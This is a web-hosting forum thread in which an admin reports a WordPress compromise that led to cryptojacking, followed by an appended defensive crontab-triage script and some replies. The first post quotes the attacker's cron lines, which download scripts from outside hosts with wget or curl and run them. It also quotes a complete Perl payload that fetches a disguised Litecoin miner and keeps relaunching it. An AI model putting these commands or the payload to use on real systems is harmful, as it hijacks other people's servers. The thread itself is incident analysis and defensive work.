#1
see you later, I'm gone
Join Date: Oct 2002
Posts: 14,110
hacking Assholes

So, one of my servers was running at about 400% apparently.

When all was said and done it seems that someone used a WP hack on one of my clients' WP installs and then managed to somehow gain shell access to set up 2 cron jobs, one under each of 2 different user accounts. The cron job appears to create an instance of a bitcoin mining operation of some kind. I found it being discussed here: http://serverfault.com/questions/598...-100-cpu-usage

This is one of the crons that was created:

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt
************************************End of cron

And this is the little perl script that they pull in in the abc.txt file:

#!/usr/bin/perl
# kill competing miners and any earlier copies of this payload
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
# pick a random worker suffix: re-roll until it is neither 0 nor 1, so 2..10
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) { $rn=int(rand(11)); }
$exists=`ls /tmp/.Ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
# bail out if the miner is already running
if($cratch=~/kernelcfg/gi || $cratchx=~/kernelupdates/gi) { die; }
# fetch the minerd tarball for this architecture and rename the binary to kernelcfg
# (note the test is inverted: wget is used when `wget --version` did not report GNU)
if($exists!~/kernelcfg/gi) {
    $wig=`wget --version | grep GNU`;
    if(length($wig)<6) {
        if($ar=~/64/g) {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        } else {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        }
    } else {
        if($ar=~/64/g) {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        } else {
            system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
        }
    }
}
# port list is only picked from and printed, never used in the miner command
@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";
# watchdog loop: relaunch the miner every 5 seconds if it is not running
while(1) {
    $cratch=`ps aux | grep -v grep | grep kernelcfg`;
    $cratchx=`ps aux | grep -v grep | grep kernelupdates`;
    if($cratch!~/kernelcfg/gi && $cratch!~/kernelupdates/gi) {
        system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
    }
    sleep(5);
}
****************************************************

I am getting the idea that it is a bitcoin mining thing only because of some of the variable names in there and the discussion I linked to. I have not examined the code at all yet. So, how many coins do you think they managed to do off my little server? I am guessing about .00000000001 BC across the week ;p
__________________
All cookies cleared!
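Added example (not from the post above or from anyone in this thread): a small crontab triage script that flags the pattern the posted crons follow, namely cd into a staging directory, fetch something with wget/curl, then hand it to an interpreter, and collects the remote hosts as indicators to block and to search the other accounts on the box for. The crontab text, host lists and function names are constructed for this example; only the three job lines are copied from the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample crontab: three of the entries quoted in the post (the
# repeated */6 entries collapsed to one) plus a benign certbot job as a control.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php
"""

DOWNLOADERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"perl", "php", "python", "python3", "sh", "bash"}
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def parse_cron_line(line):
    """Return (schedule, command) for a job line, or None for comments, blank
    lines and VAR=value assignments. @reboot-style shortcuts are not handled."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
        return None
    fields = line.split(None, 5)
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]


def _cd_target(stage):
    parts = stage.split(None, 1)
    return parts[1] if parts[0] == "cd" and len(parts) > 1 else None


def triage_command(cmd):
    """Score one cron command for the download-to-staging-dir-then-interpret chain."""
    # Split the shell chain on ; & | and take the basename of each stage's program.
    stages = [s.strip() for s in re.split(r"[;&|]+", cmd) if s.strip()]
    progs = [s.split()[0].rsplit("/", 1)[-1] for s in stages]
    dl_idx = [i for i, p in enumerate(progs) if p in DOWNLOADERS]
    ex_idx = [i for i, p in enumerate(progs) if p in INTERPRETERS]
    # A download that happens before an interpreter runs is the tell; order matters.
    download_then_exec = bool(dl_idx) and bool(ex_idx) and min(dl_idx) < max(ex_idx)
    uses_staging_dir = any((_cd_target(s) or "").startswith(STAGING_DIRS) for s in stages)
    urls = URL_RE.findall(cmd)
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {
        "command": cmd,
        "urls": urls,
        "hosts": hosts,
        "download_then_exec": download_then_exec,
        "uses_staging_dir": uses_staging_dir,
        "suspicious": download_then_exec and (uses_staging_dir or bool(urls)),
    }


def triage_crontab(text):
    """Return the distinct suspicious jobs in a crontab and the sorted set of
    remote hosts they fetch from (the IOCs to block and to hunt for elsewhere)."""
    seen, findings, iocs = set(), [], set()
    for line in text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, cmd = parsed
        if cmd in seen:  # the posted crontab repeats the same job many times
            continue
        seen.add(cmd)
        result = triage_command(cmd)
        if result["suspicious"]:
            result["schedule"] = schedule
            findings.append(result)
            iocs.update(result["hosts"])
    return findings, sorted(iocs)


if __name__ == "__main__":
    # Real use: for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u $u; done | python3 this.py
    findings, iocs = triage_crontab(SAMPLE_CRONTAB)
    for f in findings:
        print(f"[{f['schedule']}] {f['command'][:70]}...")
        print("   hosts:", ", ".join(f["hosts"]))
    print("IOC hosts:", iocs)
```

The check is deliberately about the shape of the command (fetch, then interpret, in a world-writable directory) rather than the specific hostnames, so it still fires when the attacker rotates the download server; the extracted hosts are what you then feed into a firewall rule and a grep across every other user's crontab on the server.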
#2
So Fucking Banned
Join Date: Mar 2014
Posts: 865
Maybe they were doing altcoins?

Or maybe they also attacked every site on the server (if it's shared). Hate hackers but can't help marvel at what they can do.
#3
OG
Join Date: May 2002
Posts: 3,308
what's up sarettah, long time no chat
__________________
M3server.com VPS>Get your 2nd month free Ded>$100 off your 2nd month since 1996 icq-25135623 dannyh at~m3server DOT com
#4
see you later, I'm gone
Join Date: Oct 2002
Posts: 14,110
Damn, Danny, yes. Long long time.

See you flying the M3 button. You back with them? Or never left? Or what?

Edited in: See you have an M3 email address so I guess you are there. Were you gone? Fill me in man. Expiring minds need to know ;p

And on that note. Just for the record. M3 picked up on the hack for me because of CPU usage. Then we spent most of the afternoon tracking down shit and making sure holes were patched. As always thanks to M3 - Travis, Chris, and Ryan this time - for all the help.
__________________
All cookies cleared!
#5
OG
Join Date: May 2002
Posts: 3,308
Do you have ICQ? Add me if so; if not, shoot me an email and I'll fill you in.
__________________
M3server.com VPS>Get your 2nd month free Ded>$100 off your 2nd month since 1996 icq-25135623 dannyh at~m3server DOT com
#6
Confirmed User
Join Date: Aug 2004
Location: Barcelona
Posts: 1,022
Mining Litecoin. You can see at the end it connects to the Litecoin mining pool wemineltc.com with the worker name "spdrman" plus some extra characters.
#7
Registered User
Join Date: Jan 2011
Posts: 84
We get attacked an average of 5-12 times per day across the dozens of servers and hundreds of VPS accounts I admin.
In 5 years, we've had 1 compromise which was due to an inside job by someone at a provider who had access to their admin account passwords. It's really not that hard to secure systems. You don't have to be completely paranoid because unless someone is specifically targeting you for attack most hacks are based on lazy ass script fags who look for the easy targets. Ongoing monitoring with alerts via SMS allows you to catch the occasional zero day exploit and stop it before they completely wreck a system.
__________________
-= Software / Systems Architect and Server Geek =-
#8
Registered User
Join Date: Dec 2013
Posts: 49
You can find out who this is by going here:

wemineltc.com

Subpoena them for their users' info. They should be following KYC laws (Know Your Customer) if they are compliant. The username for their pool member is spdrman and I'm sure by getting this info you will open a can of worms for that user because you will be able to see every server he/she has hacked in the pool account.

The line below configures the username, separated by a "." from the worker name, and uses any old password because pools typically do not use passwords....

system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");